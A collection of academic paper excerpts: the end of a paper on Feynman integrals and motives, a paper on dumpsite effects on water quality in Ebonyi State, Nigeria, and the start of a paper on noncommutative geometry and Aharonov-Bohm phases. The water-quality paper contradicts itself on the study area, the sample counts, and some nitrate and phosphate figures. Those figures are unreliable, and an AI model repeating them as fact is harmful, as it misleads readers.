When we transform the parametric integral using the map τ_Γ into an integral of a form defined on the complement of the determinant hypersurface D̂_ℓ in A^{ℓ²}, on a domain of integration τ_Γ(σ_n) with boundary on the divisor Σ̂_{ℓ,g}, we can similarly separate the divisor from the hypersurface by the same deformation, where instead of the locus D̂_ℓ = {det(x) = 0} one considers the level set D̂_{ℓ,ǫ} = {det(x) = ǫ}, so that D̂_{ℓ,ǫ} does not intersect τ_Γ(σ_n). The nature of the period described by the deformed integral is then controlled by the motive m(X_ǫ, Y_ǫ) for X_ǫ = A^{ℓ²} ∖ D̂_{ℓ,ǫ} and Y_ǫ = Σ̂_{ℓ,g} ∖ (D̂_{ℓ,ǫ} ∩ Σ̂_{ℓ,g}). The question becomes then whether the motivic nature of m(X, Y), with X = X_0 and Y = Y_0, and of m(X_ǫ, Y_ǫ) is the same. This in general is not the case, as one can easily construct examples of fibrations where the generic fiber is not a mixed Tate motive while the special one is. However, in this setting one is dealing with a very special case, where the deformed variety D̂_{ℓ,ǫ} is given by matrices of fixed determinant. Up to a rescaling, one can check that the fiber D̂_{ℓ,1} = SL_ℓ is indeed a mixed Tate motive, from the general results of Biglari [5], [6] on reductive groups. Thus, over a set of algebraic values of ǫ one does not leave the world of mixed Tate motives. This will give a statement on the nature of the regularized Feynman integral as a period of a mixed Tate motive m(X_ǫ, Y_ǫ), and reduces the problem to that of removing the divergence as ǫ → 0, in such a way that what remains is a convergent integral whose nature as a period is controlled by the original motive m(X, Y).
A different approach to the regularization of parametric Feynman integrals using deformations was discussed in [25] in terms of Leray cocycles and a related regularization procedure.
"year": 2009,
"sha1": "fa0f1cbdc0393dba02f86c42f74982073836fccd",
"oa_license": null,
"oa_url": "https://www.intlpress.com/site/pub/files/_fulltext/journals/atmp/2010/0014/0003/ATMP-2010-0014-0003-a005.pdf",
"oa_status": "BRONZE",
"pdf_src": "Arxiv",
"pdf_hash": "0a75cec15adedb48ac012699047e26992b807e21",
"s2fieldsofstudy": [
"Mathematics"
],
"extfieldsofstudy": [
"Mathematics",
"Physics"
]
} |
Effect of waste dumpsite on the surface and groundwater supplies using water quality index in Afikpo South Local Government Area, Ebonyi State
The research examined the effect of waste dumpsites on the surface and groundwater supplies, using the water quality index (WQI), in Afikpo South Local Government Area of Ebonyi State. Fifteen samples were drawn from fifteen locations and analyzed using standard methods. The results of the analyses were compared with the World Health Organization (WHO) drinking water standard. The WQI of the water samples was calculated and compared with the classification of water quality status. The results showed that the pH of the water samples ranged from 4.6 ± 0.047 to 6.70 ± 0.090, EC from 7.26 ± 1.63 to 2450 ± 4.32, turbidity from 0.50 ± 0.082 to 2.00 ± 0.094, TDS from 23.10 ± 0.047 to 1830 ± 17.00, alkalinity from 45 ± 0.47 to 2080 ± 4.71, total hardness from 4 ± 0.47 to 170 ± 0.94, DO from 5.07 ± 0.012 to 7.72 ± 0.016, BOD from 0.4 ± 0.047 to 12.8 ± 0.082, NO₃⁻ from 1.14 ± 0.009 to 32.69 ± 0.047, and a further parameter from 0.09 ± 0.00 to 15.6 ± 0.028. The pH, turbidity, total hardness and NO₃⁻ were all below the WHO drinking water standard. All the sampled locations showed some level of acidity. Apart from location MB, which recorded high levels of TDS and alkalinity, every other location was below the WHO permissible limit of the drinking water standard. The results of the analysis also revealed that the WQI value of the water was 57.92, which is below the critical value of 100. From the findings, the water samples need to be treated with alkali to raise the low pH, and the water generally needs comprehensive treatment before use.
Introduction
Water is the most abundant resource on earth; about 70 percent of the human body and 60–70 percent of plant cells are made up of water [1]. It is vital for the survival of any form of life. On average, a human being consumes about 2 litres of water every day. About 80 percent of the earth's surface is covered by water [2]. Out of the estimated 1,011 million km³ of total water present on earth, only 33,400 m³ of water is available for drinking, agriculture, domestic and industrial use.
Availability of water is one of the determinants of human settlement, existence and activities on the earth. Of all the environmental concerns that developing countries face, the lack of adequate, good-quality water remains the most serious [3].
Water found in nature, whether from underground or surface sources, is often polluted [4]. The pollution of these water sources renders them unwholesome for consumption and may make them costly and difficult to treat [5]. Pollution could increase as a result of industrialization on the one hand and population explosion on the other, both of which have resulted in rising demand for water.
Handling of solid waste is a major issue in several countries, especially in developing countries with high population growth [5]. In most developing countries, solid wastes are the major input of dumpsites. Hydrologically, groundwater flows from areas of higher topography towards areas of lower topography, carrying degradable material that forms leachate and pollutes the groundwater and surface water of the study areas.
Open dumping is a common practice in developing countries and one of the cheapest methods of organized waste management in many parts of the world [6], [7]. Dumpsites pose a serious threat to the quality of surface and groundwater if improperly managed and secured [8]. This threat to the surface and groundwater could be dangerous and harmful; its level depends on the composition and quantity of leachate and the distance of a dumpsite from the water source.
In Ebonyi State, Nigeria, the commonest means of disposal of solid wastes, whether in urban or rural settings, is through dumpsites/landfills. Massive population growth has put pressure on the available dumpsites and landfills which dot the landscape of these areas. Waste generated from households, markets, schools, farms, industries, etc. is deposited at the dumpsites, since this is the cheapest form of disposal [9].
Wastes deposited at dumpsites are subject to erosion into surface water or infiltration into groundwater. By percolation of water through the waste, a variety of organic and inorganic substances and microorganisms [10], collectively termed leachate, permeate through the soil into the surface and groundwater in the vicinity of the dumpsites, polluting both the surface and groundwater in the immediate surroundings and the subsoil [11] through a combination of physical, chemical and microbial processes.
The aim of this study is to investigate the effects of waste dumpsites on the surface and groundwater supplies, using the water quality index (WQI), in Afikpo South Local Government Area, Ebonyi State. The study investigates the physical and chemical water quality parameters to determine whether they meet the WHO drinking water quality standard.
Water Quality Index (WQI)
WQI is a rating technique that expresses the composite influence of individual water quality parameters on the overall quality of water for human consumption [12]. It is also known as the water pollution index: a single number that expresses water quality by aggregating the measurements of water quality parameters (such as dissolved oxygen (DO), pH, NO₃⁻, PO₄³⁻, NH₃, Cl⁻, hardness and metals). It is regarded as one of the most effective ways to communicate water quality, and water quality is assessed on the basis of calculated water quality indices [12]. The water quality index was developed by [13]. The concept of WQI is based on the comparison of water quality parameters with the respective regulatory standards. It is a proximity-to-target composite of water quality, adjusted for the density of monitoring stations in each country, with a maximum score of 100. In the classification of water quality status based on the water quality index [14], water with a WQI in the range 0–25 is rated excellent, 26–50 good, 51–75 poor, 76–100 very poor, and above 100 unsuitable for drinking. A lower score thus indicates better water quality (excellent, good) and a higher score degraded quality (poor, very poor).
Calculation of Water Quality Index
The standards for drinking purposes recommended by [15] have been considered for the calculation of the WQI. There are three steps for computing the WQI, following the weighted arithmetic method [16]. First, the quality rating or sub-index Q_n for the n-th parameter, a number reflecting the relative value of this parameter in the polluted water with respect to its standard permissible value S_n, is calculated using the expression

Q_n = 100 × (V_n − V_i) / (S_n − V_i)   (10)

where
Q_n = quality rating for the n-th water quality parameter,
V_n = estimated value of the n-th parameter at a given water sampling station,
S_n = standard permissible value of the n-th parameter,
V_i = ideal value of the n-th parameter in pure water (0 for all parameters except pH and dissolved oxygen, for which it is 7.00 and 14.60 mg/l, respectively).

Second, the unit weight is calculated as a value inversely proportional to the recommended standard value S_n of the corresponding parameter.
Where Wn = unit weight for nth parameter Sn = standard permissible value for nth parameter K = proportionality constant.
The overall WQI (Equation 12) is calculated as

WQI = Σ (Qn Wn) / Σ Wn     (12)

The investigation also covers the heavy metals in the water sources. The water quality index model (Table 1) was used to quantify and evaluate the quality of the water [6], and standard statistical packages were used in this work.
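For concreteness, the three steps can be sketched in a few lines of code. This is a minimal illustration of the weighted arithmetic method of Equations 10-12, not the study's computation: the parameter set, standards and sample values below are illustrative placeholders, and K is chosen so that the unit weights sum to one (a common convention).

params = {
    # parameter: (Vn measured, Sn standard, Vi ideal) -- placeholder values
    "pH":  (6.70, 8.5, 7.0),
    "DO":  (6.19, 5.0, 14.6),
    "TDS": (342.71, 500.0, 0.0),
    "NO3": (1.87, 10.0, 0.0),
}

K = 1.0 / sum(1.0 / sn for _, sn, _ in params.values())  # proportionality constant

num = den = 0.0
for name, (vn, sn, vi) in params.items():
    qn = 100.0 * (vn - vi) / (sn - vi)  # Equation 10: quality rating
    wn = K / sn                         # Equation 11: unit weight
    num += qn * wn
    den += wn

wqi = num / den                         # Equation 12: overall WQI

def classify(w):
    # Grading of Table 1 (weighted arithmetic WQI method)
    if w <= 25:  return "excellent"
    if w <= 50:  return "good"
    if w <= 75:  return "poor"
    if w <= 100: return "very poor"
    return "unsuitable for drinking"

print(f"WQI = {wqi:.2f} ({classify(wqi)})")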
The Study Area
The study area was Edda Local Government Area, located in the Southern Zone of Ebonyi State, Nigeria. Geographically, Edda Local Government Area is situated between 7°.45 and 5°.58 latitudes north of the equator and lies about 90 miles (144.873 km) north of the Atlantic coast. Its surface land area is about 86.14 square miles (223.1 square kilometres) [17]. Edda is bounded on the north by Ohaozara; on the south by Ohafia Local Government Area; on the east by Unwana/Afikpo and on the west by Akaeze/Nkporo. The local government area occupies about 378 square kilometres with a population of about 240,000 according to the 2006 national census (Ebonyi State). The main occupation of the people is largely farming. Edda Local Government Area is richly blessed with large mineral deposits such as lead, zinc, copper, gypsum, coal, crude oil and gas, as well as kaolin, laterite and igneous rocks [18].
Sample Locations and Codes
Samples were collected at Ekoli, Nguzu, Ebunwana, Owutu, Etiti, Amangwu and Oso, autonomous communities in Edda Local Government Area. These seven autonomous communities covered the two major geological divisions of Edda Local Government Area, with Ekoli, Nguzu and Ebunwana representing the upper division and Owutu, Etiti, Amangwu and Oso the lower division. A total of 21 sample stations (Figure 1) were mapped out in the locality and coded as Anyoji (ASp), Eme-Udu (BSp), Nne-Oji (CSp), Achi-Ogba (DSp), Iminika spring (ESp), Mgbogho Libolo (FS), Olo Ekoli (GS), Ofoiyi Owutu (HS), Oghuekpe Amangwu (IS) and Iyere Ogwuma (JS), while the borehole samples included Amaukabi (KB), Nde Okpo (LB), Okporojo Sec School (MB) and Julius Awa (NB). The control water sample was drawn from a borehole at Ninth Mile Corner in Enugu State, was coded OB and serves as the control. A hand-held electronic GPS instrument was used to record the co-ordinates of each sampling point (Table 2).
Source: Cartographic Unit, Department of Geology, Ebonyi State University
Sampling and Laboratory Analyses
The plastic containers used for sample collection were thoroughly washed with detergent, rinsed with distilled water to remove any trace of contaminant remaining in the containers, and dried. They were further rinsed with 0.1 M HNO3 and preserved with the acid prior to sampling. Composite samples were collected in one-litre polyethylene containers. The containers were labeled according to sample source using masking tape and a permanent marker for easy identification. At the point of sampling, the sample bottles were emptied and rinsed three times with the sample water itself. The hand-pumped borehole was pumped for 3 min to homogenize the mix before the container was filled to the brim and capped. In order to prevent metal loss through surface adsorption and to immobilize the metals in solution, 4 cm3 of concentrated HNO3 was added to each 1-litre water sample to preserve the metals prior to laboratory analysis. The same procedure was followed for the spring and stream water samples. For quality assurance, batch samples were collected twice a day (morning, 7.30-10.00 am, and evening, 5.00-7.30 pm) and mixed to obtain the composite sample used in the study. Triplicate determinations of each parameter were carried out on each sample. Physicochemical parameters such as temperature, turbidity and pH were taken in situ with the aid of a multiparameter datalogger (Hanna Model No. 11 1991300); EC and TDS were determined using a conductivity/TDS/Sal/Res meter, Model SX 713. The heavy metal determinations were carried out using an atomic absorption spectrophotometer (AAS), Na and K were tested with a flame photometer, and the acid radicals and total hardness were analyzed titrimetrically.
Results
The results of the evaluation of surface and groundwater quality are presented in Table 2. A summary of the statistical description of the water quality is presented in Table 3. Data are presented as means, standard deviation, standard error, coefficient of variation (CV) and percentage relative standard deviation (% RSD).
Discussion
The pH in Table 3 ranged from 4.60 to 6.7 with a mean value of 5.76, indicating moderately acidic to near-neutral water sources. Except for location MB, with a pH of 6.7 ± 0.094, all locations had pH lower than the WHO (6.5-8.5) standard for drinking water quality. This compares well with the mean values of 5.70 and 6.12 found by [17]. The low pH has the capacity to attack geological materials and leach toxic metals into the water; metals tend to be more toxic at lower pH because they are more soluble [14]. The mean and range of electrical conductivity (EC), as shown in Table 3, were 480.20 and 53.1-2450 µS/cm, respectively. Apart from location MB, which recorded the highest EC of 2450 µS/cm, all locations were below the permissible limit of 1000 µS/cm for drinking water [15], [16]. EC is related to the concentrations of total dissolved solids and major ions, and these findings agree with [19]. The high value at MB is an indication that the water there is not fresh and potable. The mean turbidity values, as shown in Table 3, ranged from 0.5 ± 0.047 to 2 ± 0.094 NTU. Turbidity in all the water samples was generally low compared with the drinking water standard of 5 NTU [1]; the appearance of water with turbidity less than 5 NTU is usually acceptable to consumers [19]. Turbidity in water samples is a function of total suspended solids (TSS) as well as total dissolved solids (TDS). Excessive turbidity, or cloudiness, in drinking water is aesthetically unappealing and may also represent a health concern. The results of the analysis in Table 3 showed that total dissolved solids (TDS) ranged from 23.1 ± 0.047 to 1830 ± 16.997 mg/l with a mean concentration of 342.71 mg/l. Apart from location MB, with a TDS of 1830 ± 16.997 mg/l, which was above the WHO permissible limit of 500 mg/l for drinking water, all locations were within the WHO limits. It is reported that water with a TDS above 500 mg/l is not recommended for drinking and other sensitive applications because of excessive scaling in water pipes and heating wares. The results in Table 3 showed that the spring waters recorded alkalinity below the WHO [19] permissible limit of 100 mg/l for drinking water, while the stream and borehole waters recorded values greater than this limit. The high alkalinity in the streams and boreholes may be due to the dissolution of crystalline limestone, which is abundant in the study area. The alkalinity of water is caused mainly by OH-, CO32- and HCO3- ions.
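As a quick sanity check of the EC-TDS relationship mentioned above, one can compare the quoted MB values against the common rule of thumb TDS ≈ ke × EC (ke typically about 0.55-0.8 for natural waters); this conversion factor is a general assumption, not a value from this study.

ec_mb = 2450.0   # µS/cm at location MB, as quoted from Table 3
tds_mb = 1830.0  # mg/l at location MB, as quoted from Table 3

ke = tds_mb / ec_mb
print(f"ke = {ke:.2f}")  # about 0.75, inside the usual 0.55-0.8 range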
[16] also reported similar results for groundwater in Ikere, which exceeded the maximum allowable contamination value of 100 mg/l. The concentration of total hardness in Table 3 ranged from 4 to 170 mg/l with a mean value of 76.33 mg/l, and all locations recorded values below the drinking water standard of 500 mg/l [30]. Total hardness is imparted mainly by calcium and magnesium ions, which, apart from sulphate, chloride and nitrate, are found in combination with carbonates [20]. Table 3 shows that dissolved oxygen (DO) ranged from 5.07 ± 0.012 to 7.72 ± 0.016 mg/l with a mean value of 6.19 mg/l. This value is high compared with the literature [20]. Of the 15 locations, 47% of the samples analyzed contained dissolved oxygen less than 6 mg/l while 53% contained more than 6 mg/l, indicating that the groundwater was not contaminated by organic matter and was non-polluted with respect to biological parameters [16]. Low DO may result in anaerobic conditions that produce obnoxious odours, and depletion of dissolved oxygen in water supplies can encourage the microbial reduction of nitrate to nitrite and sulphate to sulphide [19]. The biochemical oxygen demand (BOD) was in the range 0.4 ± 0.047 mg/l to 12.80 ± 0.082 mg/l with a mean concentration of 4.8 mg/l. These values are consistent with the findings of [17]; a low BOD is an indication of little pollution, which implies low aerobic activity. The results in Table 2 show that the NO3- concentrations recorded in all the locations ranged from 1.14 ± 0.009 to 1.73 ± 0.024 mg/l with a mean concentration of 1.87 mg/l; they were below the drinking water standard of 10 mg/l of nitrate [35]. This low level is an indication that there is little infiltration of nitrate into the water bodies from the dumpsites. It is reported that NO3- levels above the WHO limit are dangerous to children below the age of 6 and to pregnant women, as excessive nitrate exposure can result in acute acquired methaemoglobinaemia, a serious health condition [21]. The results of the analysis in Table 3 showed that the phosphate concentration ranged from 0.09 ± 0.00 to 15.76 ± 0.028 mg/l with a mean concentration of 1.85 mg/l. With the exception of location HS, with a mean concentration of 15.76 ± 0.028 mg/l exceeding the WHO stipulated tolerance level of 5.0 mg/l for potable water, all locations were within the WHO threshold for drinking water. It is stipulated in the literature that traces of PO43- at 0.1 mg/l in water have a deleterious effect on water quality by promoting the development of slimes and algal growth, and the presence of phosphate in groundwater bodies emanates from sources such as sewage, detergents, industrial effluents and agricultural drainage [7].
Water Quality Index
The results of the calculation of the water quality index (WQI) of the spring, stream and borehole waters are shown in Table 4. The WQI of the water samples was 57.92, below the critical water quality index value of 100. According to the grading of water quality [4], water with a WQI of 57.92 is of poor quality; this finding is not in accord with the value of 83.05 reported by [22]. This grade of WQI in the samples could be linked to the higher values of dissolved solids, turbidity and ions in the samples. It is reported in [14] that any water with a WQI greater than 100 is unsuitable for drinking and other domestic uses; such water needs treatment for its quality to be enhanced. Generally, the results of the analysis showed that the spring water has a lower water quality index than the stream and borehole waters, making the spring water of better quality, as fewer pollution indicators impacted the springs.
Conclusion
The physicochemical assay of the spring water samples in all the locations showed that phosphate concentrations were below the WHO drinking water standards except at Ofoiyi Owutu (HS), which recorded 15.76 ± 0.028 mg/L, above the WHO drinking water standard. The boreholes and streams showed the same trend, with the exception of Okporojo Secondary School (MB), which recorded higher values for EC (2450.00 ± 4.32 µS/cm), TDS (1830.00 ± 17.00 mg/L) and total alkalinity (2080.00 ± 4.71 mg/L), all above the corresponding WHO limits.
Recommendations
Consumers of spring water, especially the people of Ekoli Edda where only spring water exists, should be properly and regularly educated on simple domestic or household treatment of the water using CaOCl2. Studies on the soil chemistry of the spring water sources should be carried out to identify the specific cause of the acidity. In general, the spring water in the study area should be treated to improve the pH and hardness and make it safe for drinking.
Figure 1
Figure 1 Map of Edda LGA showing sample locations
Table 1
Classification of Water Quality based on Weighted Arithmetic WQI Method. Source: [6]
Table 2
Locations, Codes and GPS Co-ordinates of the sample sites
Table 3
Mean ±SE of Physicochemical Parameters of Water Samples
Table 4
Results of the Water Quality Index (WQI) of the water samples | 2024-02-26T16:05:50.603Z | 2024-02-28T00:00:00.000 | {
"year": 2024,
"sha1": "266929b175d531ac2a2a0ca8de89890c4c29e621",
"oa_license": "CCBYNCSA",
"oa_url": "https://wjarr.com/sites/default/files/WJARR-2024-0547.pdf",
"oa_status": "HYBRID",
"pdf_src": "Anansi",
"pdf_hash": "a169f184a3de03b93bf2ae45dd31dc58aaaa17a8",
"s2fieldsofstudy": [
"Environmental Science"
],
"extfieldsofstudy": []
} |
119524585 | pes2o/s2orc | v3-fos-license | Noncommutative Geometry and Geometric Phases
We have studied particle motion in generalized forms of noncommutative phase space that simulate monopole and other forms of Berry curvature, which can be identified as effective internal magnetic fields in coordinate and momentum space. The Aharonov-Bohm effect has been considered in this form of phase space, with operatorial structures of noncommutativity. The physical significance of our results is also discussed.
I. INTRODUCTION
The possible existence of the magnetic monopole (MM) was first discussed by Dirac [1] and later in [2] in non-abelian gauge theory.
However, recently [3] signatures of MM in crystal momentum space in SrRuO3 (a ferromagnetic crystal) have appeared as peaks in the transverse conductivity σ_xy. The MM formation in the low energy regime (∼ 0.1 − 1 eV) in the condensed matter system [3] (as compared to the predicted range ∼ 10^16 GeV in particle physics [2]) is obviously the reason for their observation in the former. The MM in σ_xy is in turn directly linked to the Anomalous Hall Effect (AHE), where σ_xy is identified with the Berry curvature. The intrinsic origin of the AHE [4], independent of external magnetic fields, suggests [5] that the whole phenomenon might be interpreted as motion of (Bloch) electrons in a non-trivial symplectic manifold, with the symplectic two-form being essentially the Berry curvature. This is a specific form of non-commutative (NC) space (see for example [6]), which appears because one introduces [3,7] a gauge covariant position operator x_µ ≡ i∂_µ − a_nµ(k), a_nµ = i⟨u_nk| ∂/∂k_µ |u_nk⟩, for the Bloch wavefunction ψ_nk(r) = exp(ik·r) u_nk(r), with the coordinates satisfying the NC structure [x_µ, x_ν] = −iF_µν, F_µν = ∂_kµ a_nν − ∂_kν a_nµ. This NC induces the additional anomalous part of the velocity that yields the AHE. Notice that for the crystalline system in question, Bloch states are the natural setting and the curvatures become functions of momenta, as expected. Clearly a_nµ is unrelated to any external source and is generated from within.
In a recent paper [8] the real space Berry phase manifests itself as a further contribution to the AHE in AuFe alloy, and the underlying theory [9] requires a topologically non-trivial spin configuration. The theory [9] indicates that the coupling between this net spin chirality and a global magnetization (which might be spontaneous, as in AuFe alloy) plays a crucial role. Onoda, Tatara and Nagaosa in [9] have argued that the real space and momentum space Berry phases manifest themselves in two different regimes: the real space vortex is a good picture in the disordered case (equivalently, for electrons with short mean free path), whereas the momentum space vortex is a useful model in the pure case [10]. A re-entrant ferromagnet such as the AuFe alloy is a sample of the former kind. It should also be remembered that [10], in principle, complicated structures of Berry curvature are indeed possible depending on the particular nature of a sample, although so far the only numerical work concerns the simple monopole form, as observed in [3]. Besides, a study of the underlying geometry of the ferromagnetic spin system shows that the inherent magnetic type of behavior is caused by the Berry curvature in real space, which arises due to the spin rotations of conducting electrons and is an effect of noncommutativity in momentum space [? ].
Keeping this background in mind, we put forward forms of NC space that can induce singular behavior (in the effective magnetic field) in coordinate space. Different novel structures of Berry curvature appear in our framework. Incidentally, our work is a generalization of the work of [5]. The NC structure and its associated symplectic form, considered in [5], was not general enough to allow the vortex structures that we have obtained here.
With this special form of NC space we have calculated the Aharonov-Bohm (AB) phase and have shown that there is a modification due to the noncommutativity of the space-space coordinates. This leads to a new expression and bound for θ, the noncommutativity parameter.
The paper is organized as follows: in Section II we introduce the particular form of NC space that will be studied subsequently. Section III deals with the Lagrangian formulation of the model and the related dynamics in a general way. Section IV is devoted to the study of the Aharonov-Bohm effect in this specific NC phase space. In Section V we discuss the physical implications of our findings.
II. NONCOMMUTATIVE PHASE SPACE
We start by positing a non-canonical phase space that has the Snyder form of spatial noncommutativity and in which, at the same time, the momenta satisfy a conventional monopole algebra. Similar structures have also appeared in [11]. To begin with, we introduce two distinct NC parameters θ and b for the above two independent forms of noncommutativity, so that their individual roles can be observed.
The phase space is given below, where X = √(X²). We first discuss the rotational properties of the vectors. From the definition of the angular momentum, L_j = ε_jkl X_k P_l, we obtain the commutation relations below. Notice that b (and not θ) destroys the transformation properties. This is expected, since, as is well known, the Snyder algebra does not clash with rotational invariance. To restore the angular momentum algebra, consider the term which yields the total angular momentum L̃. We naturally identify S as the effective spin vector that is induced by the algebra (1). The angular momentum algebra is then as given below, and putting d = b the algebra simplifies as follows. The above considerations prompt us to study a simpler NC algebra, with b = θ. Hence the NC algebra is governed by a single NC parameter θ.
Hence, to the approximation we are interested in (i.e., O(θ)), and ignoring terms of order θ², we find that, to the lowest non-trivial order in θ, it is possible to define an angular momentum operator in a consistent way.
Since the form of noncommutativity is operatorial in nature, we must check that the Jacobi identities are satisfied. The Jacobi identity involving the transformed angular momentum is also satisfied; however, the Jacobi identity among the momenta is violated. From the analysis of Jackiw [1] we know the implications of this violation and how to live with it.
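Because the full algebra (1) is not reproduced in this extraction, the following sketch checks the Jacobi identities for an assumed classical Snyder structure, {X_i, X_j} = θ(X_i P_j − X_j P_i), {X_i, P_j} = δ_ij + θ P_i P_j, {P_i, P_j} = 0, for which all identities close exactly; the monopole term in {P_i, P_j} discussed above is precisely the ingredient that would spoil the momentum-sector identity.

import sympy as sp
from itertools import combinations

theta = sp.symbols('theta')
X = sp.symbols('x1 x2 x3')
P = sp.symbols('p1 p2 p3')
xi = list(X) + list(P)

Pi = sp.zeros(6, 6)  # Poisson bivector: Pi[a, b] = {xi_a, xi_b}
for i in range(3):
    for j in range(3):
        Pi[i, j] = theta * (X[i]*P[j] - X[j]*P[i])           # {X_i, X_j}
        Pi[i, 3 + j] = sp.Integer(i == j) + theta*P[i]*P[j]  # {X_i, P_j}
        Pi[3 + i, j] = -(sp.Integer(i == j) + theta*P[j]*P[i])
        Pi[3 + i, 3 + j] = 0                                 # {P_i, P_j}

def jacobiator(a, b, c):
    # {xi_a, {xi_b, xi_c}} + cyclic permutations, from the bivector
    return sp.expand(sum(
        Pi[a, d]*sp.diff(Pi[b, c], xi[d])
        + Pi[b, d]*sp.diff(Pi[c, a], xi[d])
        + Pi[c, d]*sp.diff(Pi[a, b], xi[d]) for d in range(6)))

assert all(jacobiator(a, b, c) == 0
           for a, b, c in combinations(range(6), 3))
print("All Jacobi identities hold for the Snyder brackets.")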
III. SYMPLECTIC DYNAMICS
Non-violation of the Jacobi identities (at least up to the prescribed order) is essential in our case since we wish to study the dynamics by exploiting the elegant scheme of Faddeev and Jackiw [12] and follow the notation of a recent related work [13].
A generic first order Lagrangian, expressed in the form

L = a_α(η) dη^α/dt − H(η),

where η denotes the phase space variables, leads to the Euler-Lagrange equations of motion

(15) ω_αβ dη^β/dt = ∂H/∂η^α,  ω_αβ = ∂a_β/∂η^α − ∂a_α/∂η^β,

where ω_αβ denotes the symplectic two-form. The inverse of the symplectic matrix is given by ω^αβ.
For our model, following (7), ω_αβ is defined accordingly, and the particle dynamics is easily derived in a straightforward way by exploiting (15). Considering a simple form of H, we identify −∂V/∂X_i ≡ E_i as the external electric field, and the equations of motion can be rewritten with m* = m(1 − θP²)^(−1), where the spin vector S has been defined in (3). It is interesting to note that the origins of the Berry curvature terms in (19) and (20) are different: the Snyder form of spatial noncommutativity in (1) is responsible for the former, whereas the monopole form of the momentum noncommutativity in (1) is responsible for the latter. We can also express (19) as (21). It is straightforward to iterate (17) once again, so that we obtain a generalized Lorentz force equation, (22). We will study the significance of these equations in the Discussion, Section V, at the end.
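Since the displayed equations are not fully reproduced here, the symplectic recipe of (15) can be illustrated on a standard toy model (an assumption, not the paper's system): a planar particle with brackets {x_i, p_j} = δ_ij and {p_1, p_2} = qB. Inverting the symplectic structure and applying it to H = p²/2m should return the Lorentz force law.

import sympy as sp

x1, x2, p1, p2, m, q, B = sp.symbols('x1 x2 p1 p2 m q B')
eta = [x1, x2, p1, p2]

# omega^{alpha beta} = {eta^alpha, eta^beta}: the inverse symplectic matrix
omega_inv = sp.Matrix([
    [0,     0,    1,    0],
    [0,     0,    0,    1],
    [-1,    0,    0,  q*B],
    [0,    -1, -q*B,    0],
])

H = (p1**2 + p2**2) / (2*m)
grad_H = sp.Matrix([sp.diff(H, v) for v in eta])
eta_dot = omega_inv * grad_H  # eta_dot^alpha = omega^{alpha beta} dH/deta^beta

print(eta_dot.T)  # [p1/m, p2/m, q*B*p2/m, -q*B*p1/m]: pdot = q v x B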
IV. THE AHARONOV-BOHM EFFECT ON NC (SNYDER) SPACE
In non-commutative space many interesting quantum mechanical problems have been studied extensively, such as the hydrogen atom spectrum in an external magnetic field [14,15] and the Aharonov-Bohm (AB) [16,17] and Aharonov-Casher effects [18], to name a few. However, all of the above works have considered a constant form of spatial noncommutativity. In the present work, for the first time, we consider such effects in the presence of an operatorial form of noncommutativity. Here we consider a purely Snyder form of noncommutative space, obtained from (1) by putting {P_i, P_j} = 0.
In the commutative Aharonov-Bohm effect, the presence of the flux produces a shift in the interference pattern; for a suitable value of the flux the positions of the maxima and minima are interchanged, due to a change of π in the phase, and the shift vanishes when the magnetic flux is quantized. In the noncommutative Aharonov-Bohm effect, a velocity-dependent extra term in the flux arises even in the presence of a quantized magnetic flux [16]. This could be experimentally measured. The velocity can, however, be so chosen that the phase shift becomes 2π or an integer multiple of 2π, in which case the shift would not be observed. The Aharonov-Bohm effect in the noncommutative case can also be worked out using the path integral formulation [16]. Electrons moving on a noncommutative plane in uniform external magnetic and electric fields represent the usual motion of electrons in an effective magnetic field; the related AB phase can be calculated and yields the same effective magnetic field [17]. Using non-commutative quantum mechanics, the Aharonov-Bohm phase can also be obtained on NC phase space [17].
For the NC phase space (23), the variables X_i, P_j can be expressed in terms of a canonical (Darboux) set of variables x_i, p_j, as in (24); the x_i, p_j satisfy the canonical algebra (25). Let H(X, P) be the Hamiltonian operator of the usual quantum system; then the Schrödinger equation on NC space is written with a star product. The star product can be changed into the ordinary product by replacing H(X, P) with H(x, p) [19], so the Schrödinger equation can be written in the ordinary form (27). When a magnetic field is applied, we also need to replace the vector potential A_i by a phase shift, as given in (28), so that the Schrödinger equation (27) in the presence of the magnetic field becomes (29). If ψ_0 is the solution of (29) when A_i = 0, then the general solution of (29) may be given by (30), whose phase term is called the AB phase. In a double slit experiment, if we consider a charged particle of charge q and mass m passing through one of the slits, then the integral in (30) runs from the source x_0 to the screen x, and the interference pattern depends on the phase difference between the two paths. The total phase shift for the AB effect is (31), where we use the relation m v_l = p_l − q A_l; the line integral runs from the source through one slit to the screen and returns to the source through the other slit. The first term of (31) is the usual AB phase. One of the four θ-dependent terms in (31) is computed explicitly, and the rest are computed in a similar way. Adding all the terms, we can write the AB phase as (32). Previous results [16,17], with a constant form of spatial noncommutativity, are of the form (33). Comparing our result with (33), we find that the NC correction in our case has an altogether different structure, and there also appears an extra piece (m v + q A)·x, which is a consequence of the form of space-space noncommutativity chosen in our model. We discuss the implications of our result in the Discussion section.
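For orientation, the leading (commutative) term of (31) can be evaluated numerically; the values below are illustrative, not taken from the paper, and the θ-dependent corrections are omitted.

import math

hbar = 1.054571817e-34   # J s
q = 1.602176634e-19      # C, electron charge magnitude

flux_quantum = 2*math.pi*hbar/q      # h/e, about 4.14e-15 Wb
Phi_B = 3*flux_quantum               # an exactly quantized flux

delta_phi = q*Phi_B/hbar             # the usual AB phase in (31)
print(delta_phi/(2*math.pi))         # 3.0: no observable shift mod 2*pi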
V. DISCUSSIONS:
Let us summarize and motivate our results. Our aim has been to demonstrate that effective models of interest (especially in the context of condensed matter physics) can be simulated compactly in a purely Hamiltonian formulation, developed in a suitable noncommutative space. The advantage is that one can have a simple form of the Hamiltonian, with the complicated responses of the system induced by the noncommutative structure of spacetime. To be specific, in the present work in Section III we have shown that effective spin contributions are generated in our model solely from the symplectic structure, with no explicit spin term as such.
It was shown in [5] that the anomalous velocity term related to the spin Hall effect has a natural interpretation in terms of a noncommutative space. We have shown that this result can be generalized in various ways: one can have Berry curvature terms both in coordinate and in momentum space, and the singularity structure of the Berry potential (not shown here) can be more complicated than that of a monopole. This becomes apparent if one inverts ω_αβ in (15) to recover the Berry potential.
A novel form of anomalous velocity term has been derived in (17). From the equivalent form (19) we infer that there will be a deviation in the particle trajectory in the presence of an electric field [20].
